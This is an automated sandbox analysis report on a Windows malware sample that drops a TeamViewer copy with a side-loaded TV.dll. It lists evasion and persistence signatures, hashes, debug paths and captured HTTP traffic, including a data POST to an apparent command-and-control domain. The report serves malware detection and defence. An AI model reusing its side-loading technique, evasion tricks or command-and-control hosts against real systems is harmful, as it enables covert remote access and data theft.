Windows Analysis Report 77Etc0bR2v.bin

Overview

General Information

Sample Name: 77Etc0bR2v.bin (renamed file extension from bin to exe)
Analysis ID: 483795
MD5: e71e3b995477081569ed357e4d403666
SHA1: 809c4cc4ae51fcf3eca24e7d7fa5c1b6b5db52ce
SHA256: 94b9abbe10bd9d6abcb8dce27814992bf7a09ed416c66998bd3496bda1490713
Tags: exe, HartexLLC, signed, soldewornek

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 17
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (window names)
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
DLL side loading technique detected
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Contains functionality to execute programs as a different user
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
EXE planting / hijacking vulnerabilities found
AV process strings found (often used to terminate AV products)
PE file does not import any functions
DLL planting / hijacking vulnerabilities found
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates or modifies windows services
Queries disk information (often used to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality to delete services
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: 77Etc0bR2v.exe Virustotal: Detection: 37%
Source: 77Etc0bR2v.exe ReversingLabs: Detection: 37%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll ReversingLabs: Detection: 26%
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.77Etc0bR2v.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen2

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0049B32E __EH_prolog3,CryptGenRandom,__CxxThrowException@8, 6_2_0049B32E
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0049B4A0 __EH_prolog3_catch,CryptAcquireContextA,__CxxThrowException@8, 6_2_0049B4A0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_006F605B CryptReleaseContext, 6_2_006F605B

Privilege Escalation:

EXE planting / hijacking vulnerabilities found
Source: C:\Users\user\Desktop\77Etc0bR2v.exe EXE: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
DLL planting / hijacking vulnerabilities found
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SAMCLI.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WINMM.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: Secur32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SHFolder.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: VERSION.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: version.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: userenv.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WININET.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: Cabinet.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: MSVFW32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: CRYPTSP.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: AVICAP32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WSOCK32.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: uxtheme.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: C:\Users\user\AppData\Roaming\TeamViewer\TV.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: edputil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: iertutil.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: urlmon.dll
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: SHFOLDER.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: WINMMBASE.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: NETUTILS.DLL
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SRVCLI.DLL
Source: C:\Users\user\Desktop\77Etc0bR2v.exe DLL: CLDAPI.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: winsta.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: SensApi.dll
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe DLL: msimg32.dll

Compliance:

Uses 32bit PE files
Source: 77Etc0bR2v.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 172.67.205.33:443 -> 192.168.2.5:49752 version: TLS 1.2
PE / OLE file has a valid certificate
Source: 77Etc0bR2v.exe Static PE information: certificate valid
Binary contains paths to debug symbols
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000000.248354539.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.524713839.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.336944696.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.348837191.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.342853199.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000000.345802287.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.268193262.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000002.536045317.000000006EAFD000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.514763598.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000002.341816195.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000002.362277725.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345987825.000000006EAFD000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000002.367975860.000000006EAFD000.00000002.00020000.sdmp
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_00405E61 FindFirstFileA,FindClose, 1_2_00405E61
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040263E FindFirstFileA, 1_2_0040263E
Source: C:\Users\user\Desktop\77Etc0bR2v.exe Code function: 1_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_0040548B
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 3_2_6EAF28B0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 3_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 3_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_004BF3A9 __EH_prolog3,GetVolumeInformationW,FindFirstFileW,FindClose,FindFirstFileW,FindClose,GetVolumeInformationW, 6_2_004BF3A9
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_0050331C __EH_prolog3_catch,FindFirstFileW,GetLastError,__CxxThrowException@8,FindClose, 6_2_0050331C
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 6_2_6EAF2DF0
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe Code function: 6_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 6_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF28B0 RtlZeroMemory,RtlZeroMemory,wsprintfA,wsprintfA,wsprintfA,FindFirstFileA,lstrcmpA,lstrcmpA,lstrcmpA,lstrcatA,DeleteFileA,FindNextFileA,FindClose, 8_2_6EAF28B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 8_2_6EAF2DF0 wsprintfA,wsprintfA,RtlZeroMemory,FindFirstFileA,wsprintfA,DeleteFileA,MoveFileExA,FindNextFileA,FindClose, 8_2_6EAF2DF0

Networking:

Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85134Content-Type: multipart/form-data; boundary=--------3509900953User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmRiamBoamBuTJKIemBMmoKGemDwysbMaMTEZsLKzMLGvmLIZshiyspkxsjGYG7Mwr5kanBybGRgbmRiTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260701&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAAiHrQD5CYOpp7/Zr7rEi/B/CnsUWehIzsjknPiOAQDnHgKBwxxFKCieiWhL1afx9eeCX4JSt5eDF8v1iZJ9o8IQAaQCrRik6ahUAKNkNBEdbLOE0i1SajuFK2r+FTuYEW7cUOxEu9d8mU9y6bkESGL5okL1ayDi3W7V7M1bCeZL HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260710&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyakoh6YPDKxsxoxMRmwsrMwsa+YshmyGLKymTGyMZgbszCvmRqcHJsZGBuZGJMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAC+ETh/xoaDswnDrzpj2ezWmEgvX0+Ej1wtEYkKVyn+ydtvyFua/3Iri8RKmf9YcE9fPWO9gKA702VTWXdcuP9paHCFsUzDIqXKZ7SOAdSL0LmDI+BCYg1VARH3ovhl/wWKHhKvbobA55zrvFJv9j5s06datZSDN5Epd+G/FNL5V HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260719&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /dout.aspx?s=39260736&p=10000001&client=DynGate&data=FyQS+gChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmRiamBoamBuTJKIemZyYmBmYnBuakyWysrgwtjS7Mp6YkyYwtzO6sLOynrUwkyY0sbK3ObKqPLgynpgTJqSiHpg8MrGzGjExGbCyszCxr5iyGbIYsrKZMbIxmBuzMK+ZGpwcmxkYG5kYkyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpwTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=39260736&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master15.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12652280&p=10000001&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Content-Length: 3Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /dout.aspx?s=12652280&p=10000002&client=DynGate HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Content-Length: 500000Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /din.aspx?s=12652280&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 178.255.154.140Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 178.255.154.140
Source: TeamViewer.exe, 00000006.00000003.365826240.000000000575A000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.280519972.000000000570A000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001.
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001.Windows.Phot
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001p
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp String found in binary or memory: http://178.255.154.140/din.aspx?s=00000000&m=fast&client=DynGate&rnd=7666614&p=10000001y#U
Source: TeamViewer.exe, 00000006.00000002.530437630.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=1000
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.280800923.000000000570A000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/din.aspx?s=12652280&m=fast&client=DynGate&p=10000002ter15.teamviewer.com
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000003.329170945.000000000569B000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGate
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGatet
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000001&client=DynGateu
Source: TeamViewer.exe, 00000006.00000002.530437630.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client=DynGate
Source: TeamViewer.exe, 00000006.00000002.526671283.0000000000B8B000.00000004.00000020.sdmp String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client=DynGate-Out)LMEMX
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/dout.aspx?s=12652280&p=10000002&client=DynGatet
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp String found in binary or memory: http://178.255.154.140/ent=DynGate&p=10000002
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.524829525.000002B018288000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: svchost.exe, 00000005.00000002.524829525.000002B018288000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: svchost.exe, 00000005.00000002.524829525.000002B018288000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 77Etc0bR2v.exe, 00000001.00000002.249443051.000000000288E000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.249510284.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000006.00000001.263849967.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000011.00000001.320706036.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000012.00000001.331702639.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000013.00000002.345767662.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000014.00000001.347527038.0000000010000000.00000002.00020000.sdmp String found in binary or memory: http://go.teamviewer.comn0
Source: TeamViewer.exe, 00000006.00000003.274797829.0000000005791000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001:
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001H5
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001H;t
Source: TeamViewer.exe, 00000006.00000003.274797829.0000000005791000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001c6
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001h
Source: TeamViewer.exe, 00000006.00000003.274699335.000000000577F000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=10241550&p=10000001j
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=100000012
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001Windows.Phot
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001m
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001s
Source: TeamViewer.exe, 00000006.00000002.526646142.0000000000B86000.00000004.00000020.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=7666614&p=10000001w
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=39260701&client=DynGate&p=10000002g
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=39260719&client=DynGate&p=10000002w
Source: TeamViewer.exe, 00000006.00000003.281018743.0000000005748000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/din.aspx?s=39260736&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000006.00000003.291353124.000000000575A000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/dout.aspx?s=39260701&p=10000001&client=DynGate&data=FyQSiQCjHqkys5Mko
Source: TeamViewer.exe, 00000006.00000003.376075558.0000000005749000.00000004.00000001.sdmp, TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/dout.aspx?s=39260710&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6s
Source: TeamViewer.exe, 00000006.00000002.533222277.0000000005790000.00000004.00000001.sdmp String found in binary or memory: http://master15.teamviewer.com/dout.aspx?s=39260719&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s
Source: TeamViewer.exe, 00000006.00000002.530437630.0000000003A1C000.00000004.00000001.sdmp String found in binary or memory: http://mastr15.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=7
